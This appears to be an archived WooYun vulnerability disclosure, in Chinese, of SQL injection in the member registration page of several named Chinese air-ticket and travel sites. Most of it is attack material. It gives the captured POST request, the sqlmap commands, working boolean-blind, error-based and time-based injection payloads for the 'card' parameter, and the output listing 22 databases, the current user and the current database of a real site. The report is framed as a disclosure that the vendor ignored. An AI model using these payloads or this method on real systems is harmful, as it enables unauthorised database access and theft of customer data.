乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-17: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-05-01: 厂商已经主动忽略漏洞,细节向公众公开
RT
http://www.bl-air.com/member/reg.aspxhttp://www.qichen-air.com/member/reg.aspxhttp://www.cht-travel.com/member/reg.aspxhttp://www.xwtravel.com/member/reg.aspxhttp://www.89937373.com/member/reg.aspx
在点注册的时候抓包
POST /member/reg.aspx HTTP/1.1Host: www.qichen-air.comConnection: keep-aliveContent-Length: 609Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.qichen-air.comUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.69 Safari/537.36 2345chrome v2.5.0.5031Content-Type: application/x-www-form-urlencodedReferer: http://www.qichen-air.com/member/reg.aspxAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: ASP.NET_SessionId=kbdll4ggf0gf5d1aeqzwq0hz__VIEWSTATE=%2FwEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly%2FfhqDybEmN%2FXc%2FN4Qap8sLFNfpTZ&__EVENTVALIDATION=%2FwEWFAKxyKKfBgL%2F7vn%2FBAKGzIzaAgLmjOH%2BAQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS%2FawDAoLK%2FawDAs%2BX1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs%2Fv5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU%3D&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=13456465%40qq.com&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C
C:\sqlmap>sqlmap.py -r 2.txt --dbs sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:17:57[20:17:57] [INFO] parsing HTTP request from '2.txt'[20:17:57] [INFO] resuming back-end DBMS 'microsoft sql server'[20:17:57] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: card Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95') AND 3471=3471 AND ('OUrX'='OUrX&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95') AND 1715=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1715=1715) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(102)+CHAR(113))) AND ('xpXb'='xpXb&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=-2740') OR 6798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('kWyd'='kWyd&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C---[20:17:58] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[20:17:58] [INFO] fetching database names[20:17:58] [INFO] the SQL query used returns 22 entriesavailable databases [22]:[*] master[*] model[*] msdb[*] oa_users[*] PiaoYou_8800000[*] PiaoYou_csxjt[*] PiaoYou_dcswlhy[*] PiaoYou_dcswlma[*] PiaoYou_james[*] PiaoYou_njzb[*] PiaoYou_sha793[*] PiaoYou_shanixin[*] PiaoYou_shaswair[*] PiaoYou_shazhouxq[*] PiaoYou_shengjie[*] PiaoYou_szvlefei[*] qicheng_web[*] sha_qicheng[*] sha_xingchuan[*] sha_yuanjin[*] tempdb[*] zgppt[20:17:58] [INFO] fetched data logged to text files under 'C:\sqlmap\output\www.qichen-air.com'[*] shutting down at 20:17:58C:\sqlmap>sqlmap.py -r 2.txt --current-user --current-db sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 20:18:34[20:18:34] [INFO] parsing HTTP request from '2.txt'[20:18:34] [INFO] resuming back-end DBMS 'microsoft sql server'[20:18:34] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: POSTParameter: card Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95') AND 3471=3471 AND ('OUrX'='OUrX&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=abb95') AND 1715=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(117)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (1715=1715) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(121)+CHAR(106)+CHAR(102)+CHAR(113))) AND ('xpXb'='xpXb&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&mail=[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: __VIEWSTATE=/wEPDwUKMTgzMDk3NTU5OA9kFgICAw9kFgICAQ9kFgQCBQ8WAh4HVmlzaWJsZWhkAgcPFgIfAGhkZPQ0tJUzAlc9qjly/fhqDybEmN/Xc/N4Qap8sLFNfpTZ&__EVENTVALIDATION=/wEWFAKxyKKfBgL/7vn/BAKGzIzaAgLmjOH+AQL7uPQdAs2zwI8JAsaZ0ZUMAtSz9JcFAsaS/awDAoLK/awDAs+X1sIPArCBu5YNAqW6yJUHAryX5sIPApCUsf0FAs/v5u8MApeirpYPAtiate4GAuuX0uAIAsDJ4dcFML1UCtL2G4isPqyZGvvSTsu9d2sYih69nLVUFGA6PeU=&levelm=%E5%85%AC%E5%8F%B8%E5%AE%A2&name=aaa&card=-2740') OR 6798=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND ('kWyd'='kWyd&pwd=abb95&lxr=&sex=%E7%94%B7&phone=15111242355&mobile=15111242355&fax=&[email protected]&qq=&msn=&company_name=&address=®ok=%E6%8F%90%E4%BA%A4%E6%B3%A8%E5%86%8C---[20:18:35] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[20:18:35] [INFO] fetching current user[20:18:35] [INFO] resumed: qicheng_webcurrent user: 'qicheng_web'[20:18:35] [INFO] fetching current database[20:18:35] [INFO] resumed: qicheng_webcurrent database: 'qicheng_web'[20:18:35] [INFO] fetched data logged to text files under 'C:\sqlmap\output\www.qichen-air.com'[*] shutting down at 20:18:35C:\sqlmap>
你们更专业!
未能联系到厂商或者厂商积极拒绝